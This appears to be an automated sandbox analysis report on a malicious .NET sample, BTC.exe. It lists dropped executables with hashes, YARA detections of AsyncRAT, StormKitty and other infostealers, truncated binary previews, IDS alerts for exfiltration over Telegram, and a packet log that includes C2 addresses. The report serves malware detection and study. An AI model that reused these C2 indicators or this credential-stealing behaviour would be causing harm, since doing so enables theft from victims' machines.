                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f................................. ........@.. ....................... ............@....................................W.......0............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................H........`..._............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                  C:\Users\user\AppData\Roaming\Windows Security Health Service.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):75776
                                                  Entropy (8bit):5.801146631564073
                                                  Encrypted:false
                                                  SSDEEP:1536:dU40cxhzjBCViPMVSe9VdQuDI6H1bf/6hQzceLVclN:dU1cxhzVCiPMVSe9VdQsH1bfoQ3BY
                                                  MD5:0DFA83A82F6418C73406D78296DE61BE
                                                  SHA1:DD7ECEEF8A434C43E0751E180BF714E08771D336
                                                  SHA-256:8D27369FFA8B29D561FA9DAF485BE14D2FC00287BB1C69D4C84D514891C8DB5E
                                                  SHA-512:9A4B026250B18C29AB7DD48203F321C2EF2F12695BD2DCB52EBBC15001C8DDF019D5A7E04DA056C50C1881CE269D1810259BF6D04B61F471E8751B7192FC73D4
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................4... ...@....@.. ....................................@.................................D4..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................4......H.......Py..........0....................................................W......H3.......W......3........./.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*.~....(....9.....~....(....(....*.(....*n~....(....~.....(....(....*.r...p.(.....(.....@....(.....A...(....*f.~#...}......}.....($...*..($...*.~....%:....&~....../...sM...%.....sN...(O...~....(.........*.~....o....9 ...~.....(....(G...9....~.....(....*.s................s)........~J...............*.s.........*r~....o

                                                  C:\Users\user\AppData\Roaming\crack.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):8704
                                                  Entropy (8bit):4.739992627696532
                                                  Encrypted:false
                                                  SSDEEP:96:1xXv/rn2JKbqjV6IoG71k7PNnvIcckV579WbhRN6+fwls+VV7+bN+EhkBQET8lzj:z/rn2JKb6V6NGRk7Vwe9WbhRNEdwyJC
                                                  MD5:9215015740C937980B6B53CEE5087769
                                                  SHA1:A0BFE95486944F1548620D4DE472C3758E95D36A
                                                  SHA-256:A5390A297F14EF8F5BE308009EC436D2A58598188DBB92D7299795A10BA1C541
                                                  SHA-512:5B9BBF1836466D803D3E160A38E10C8397AA3966C120AB6435A52B7D0A09EB664EF2172BF0E7E2DE1CC3EAE261167C9355FA7AC3B1B7E4504A7E07B82C4B90E2
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_Rezlt, Description: Yara detected Rezlt, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.e.............................7... ...@....@.. ....................................@.................................D7..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H........%..L............................................................(....(....*.0..........(....9....r...p(....&r...p(....r/..p~....(....(.......................r3..p...(.......rk..p...(.......r...p...(.......r...p...r...p(.......r...p....(........r...p....~........r7..p....(.......rU..p(........ru..p..(......(....(....&*r...p(....&*.0..-.......s......r...p =...o........&.......,..o......*........................!.......0..=.......s......s......r...po......o......o......

                                                  C:\Users\user\AppData\Roaming\svchost.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):174080
                                                  Entropy (8bit):5.922618827152215
                                                  Encrypted:false
                                                  SSDEEP:3072:T+STW8djpN6izj8mZwlZbX5gD5sLIPu/i9bTJ2cJ+rj6+Wpn:w8XN6W8mmzmDWMPSi9b1O
                                                  MD5:96014694A042D8344B910BC47D79337B
                                                  SHA1:9D19AB2F110AE58F30965A5A3D608CBF51986EDB
                                                  SHA-256:4950EB74909BD6E739E38E57D8C6465C76EF108D65CAC9F130D3F5C6D2FE943F
                                                  SHA-512:FE308C42B3AD2C3D73A834399AA12EA23F336103389181DFACE80A81DA8BE1FFD9A950CAC802DC8A806AD318EB90A6BB6021D1ACD9206A07749F83F2BB6CD03D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0.............N.... ........@.. ....................................`.....................................K.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........6..t..............................................................<...4..#.V.w.d!...HAZ.......I.1.......Y.T8D.c[..2.....I...g...:.m..e.........j{Um7..9.M.&,..C....:.]).#..l.AG8.B..3O)..n............5.).c.....ati..2..g)...%....P...7^.<$."......V..;...$0.xC.=VD..b......9A..Pu.|.`.X....E...g.1..F.OU...9=.^tL..l.U..%./^}.....< b...0....8..h..z.;.G..EbT.s..;...........>T....uRa[...'.........\RU..eh.F..i...,.z8....a......f....M.\%......T"...i.G.e..

                                                  C:\Users\user\AppData\Roaming\update.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):230912
                                                  Entropy (8bit):6.297675450114108
                                                  Encrypted:false
                                                  SSDEEP:3072:P+STW8djpN6izj8mZwDODZG6vmwTMUbBYeVUeE1dMGryePSuqKv65A8kC5A6+Wpn:E8XN6W8mmGmvUbGp54uVv6SHC
                                                  MD5:B8DF7316CC35A0FB6FE3A326B4283010
                                                  SHA1:D49C11F5A95F72E37D6194DF41178F2B7FAA01EE
                                                  SHA-256:F243DF692EE7552286D52B23E4993E07A27877AA86C63B84903A8E6CBD0D19F3
                                                  SHA-512:3EF92BE29123695820970A003FD0561A57F87C8C6ADAE86781729027CE40EDE4B63DA30D0B0CC75376BD9AE90ACCAF674FC7FF799A8B73AB4BB45B2CA65FF120
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0..|.............. ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B.......................H........6...d.............................................................<...4..#.V.w.d!...HAZ.......I.1.......Y.T8D.c[..2.....I...g...:.m..e.........j{Um7..9.M.&,..C....:.]).#..l.AG8.B..3O)..n............5.).c.....ati..2..g)...%....P...7^.<$."......V..;...$0.xC.=VD..b......9A..Pu.|.`.X....E...g.1..F.OU...9=.^tL..l.U..%./^}.....< b...0....8..h..z.;.G..EbT.s..;...........>T....uRa[...'.........\RU..eh.F..i...,.z8....a......f....M.\%......T"...i.G.e..

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):502
                                                  Entropy (8bit):4.621947447102293
                                                  Encrypted:false
                                                  SSDEEP:12:PYI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:DdUOAokItULVDv
                                                  MD5:3C2549B8E8B5460A95748CCC3CD1BEA8
                                                  SHA1:99895C6D36EC820FE6A210E186B09AF7CD089696
                                                  SHA-256:EAFA177E97F49A260A5951D5B4EC13790F9D909597F417523B07109A96482BF7
                                                  SHA-512:A75E3251EAD6D1CDDB9D54ED989FCD1817A395745C831BF8EAF70CED5EA62C7B5B957C699391D3664CF401B88E97E2E8112C5C2AB94FEC39B22564A56D6D43D0
                                                  Malicious:false
                                                  Preview:..Pinging 936905 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.886242395185257
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:BTC.exe
                                                  File size:1'159'168 bytes
                                                  MD5:f1424e5b9810a4a9c33506aa784fca89
                                                  SHA1:4ad6287fe149832551afbcb1113db50cd133777b
                                                  SHA256:8a3da2a07e82bf22f3cd239de861b2b8c50c9fe9ee2ba12a33564e1b5cc93fed
                                                  SHA512:e03432137a7c12c03d34302fe4e1774a3a08935d39f665e4086fd8637f4ea961a645e2a8bb3cd85dd24c54861e4f01b0500a70641e2fa3a4a09e2e89a3b77380
                                                  SSDEEP:12288:JYYjzzONcuuIYsYNeaCbU6sKySaVQ4pBgncu7EKHCBbsCU/hpgmxCBbsCUXEGnF9:eg9uurUngnBU97EniCUppoiCUXfF9
                                                  TLSH:483512BF31572614FB623FB1CC216840586C3F1C38B27667D8B8FE577ABE6885890499
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..f................................. ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:0f71e969e9f96117

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x50bcee
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66D29848 [Sat Aug 31 04:12:56 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x10bc940x57.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x10c0000x10d8c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x109cf40x109e00fac118dfda39e39d38a28c50117f90fdFalse0.9721548836389281data7.998268120908593IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x10c0000x10d8c0x10e00c2629c558c2e758fcd68e803b5be9640False0.06809895833333333data2.0106016487580005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x11e0000xc0x200a628a44e0ca10f1b6b4661f73589dd94False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x10c1300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2953 x 2953 px/m0.059328049213297054
                                                  RT_GROUP_ICON0x11c9580x14data1.0
                                                  RT_VERSION0x11c96c0x234data0.4698581560283688
                                                  RT_MANIFEST0x11cba00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                  2024-09-03T06:15:58.964537+0200TCP2049872ET MALWARE Rezlt RDP Grabber - This is Not RDP149705443192.168.2.5149.154.167.220
                                                  2024-09-03T06:15:58.964613+0200TCP2045614ET MALWARE MSIL/Spyware Activity via Telegram (Response)144349705149.154.167.220192.168.2.5
                                                  2024-09-03T06:16:41.916861+0200TCP2031009ET MALWARE StormKitty Data Exfil via Telegram149728443192.168.2.5149.154.167.220
                                                  2024-09-03T06:16:41.916861+0200TCP2044766ET MALWARE WorldWind Stealer Checkin via Telegram (GET)149728443192.168.2.5149.154.167.220
                                                  2024-09-03T06:15:58.451017+0200TCP2036383ET MALWARE Common RAT Connectivity Check Observed14970680192.168.2.5208.95.112.1
                                                  2024-09-03T06:16:42.593395+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349730443192.168.2.5149.154.167.220
                                                  2024-09-03T06:16:41.704665+0200TCP2031009ET MALWARE StormKitty Data Exfil via Telegram149729443192.168.2.5149.154.167.220
                                                  2024-09-03T06:16:41.704665+0200TCP2044766ET MALWARE WorldWind Stealer Checkin via Telegram (GET)149729443192.168.2.5149.154.167.220
                                                  2024-09-03T06:16:39.987059+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1497197812192.168.2.5146.190.29.250
                                                  2024-09-03T06:16:04.017776+0200TCP2036383ET MALWARE Common RAT Connectivity Check Observed14970780192.168.2.5208.95.112.1
                                                  2024-09-03T06:16:48.962020+0200TCP2044557ET MALWARE WorldWind Stealer Sending System information via Telegram (POST)149734443192.168.2.5149.154.167.220
                                                  2024-09-03T06:16:42.985167+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349731443192.168.2.5149.154.167.220
                                                  2024-09-03T06:16:05.473252+0200TCP2853685ETPRO MALWARE Win32/XWorm Checkin via Telegram149708443192.168.2.5149.154.167.220

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 3, 2024 06:15:57.793833017 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:57.793869019 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:57.793932915 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:57.800549030 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:57.800560951 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:57.955869913 CEST4970680192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:15:57.960674047 CEST8049706208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:15:57.960756063 CEST4970680192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:15:57.960913897 CEST4970680192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:15:57.965795994 CEST8049706208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:15:58.404905081 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:58.404963017 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:58.406819105 CEST8049706208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:15:58.411218882 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:58.411231995 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:58.411478996 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:58.451016903 CEST4970680192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:15:58.455244064 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:58.609114885 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:58.652549982 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:58.964478970 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:58.964531898 CEST44349705149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:15:58.964580059 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:15:58.967629910 CEST49705443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:03.513463974 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:16:03.519315004 CEST8049707208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:16:03.519412994 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:16:03.519687891 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:16:03.524441004 CEST8049707208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:16:03.967185974 CEST8049707208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:16:04.017776012 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:16:04.367466927 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:04.367511034 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:04.367656946 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:04.390948057 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:04.390966892 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:04.977566004 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:04.977655888 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:04.983246088 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:04.983256102 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:04.983496904 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:05.188509941 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:05.190912962 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:05.305213928 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:05.352493048 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:05.473287106 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:05.473362923 CEST44349708149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:05.473470926 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:05.667341948 CEST49708443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:05.972495079 CEST497097812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:16:05.977654934 CEST781249709165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:16:05.979346991 CEST497097812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:16:06.091406107 CEST497097812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:16:06.139437914 CEST497107812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:06.292504072 CEST781249709165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:16:06.292521000 CEST781249710146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:06.292670012 CEST497107812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:06.867487907 CEST497117812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:16:06.872544050 CEST781249711185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:16:06.872670889 CEST497117812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:16:06.889863968 CEST497117812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:16:06.894886017 CEST781249711185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:16:08.680813074 CEST781249711185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:16:08.680890083 CEST497117812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:16:11.698016882 CEST497117812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:16:11.698367119 CEST497127812192.168.2.5185.252.232.158
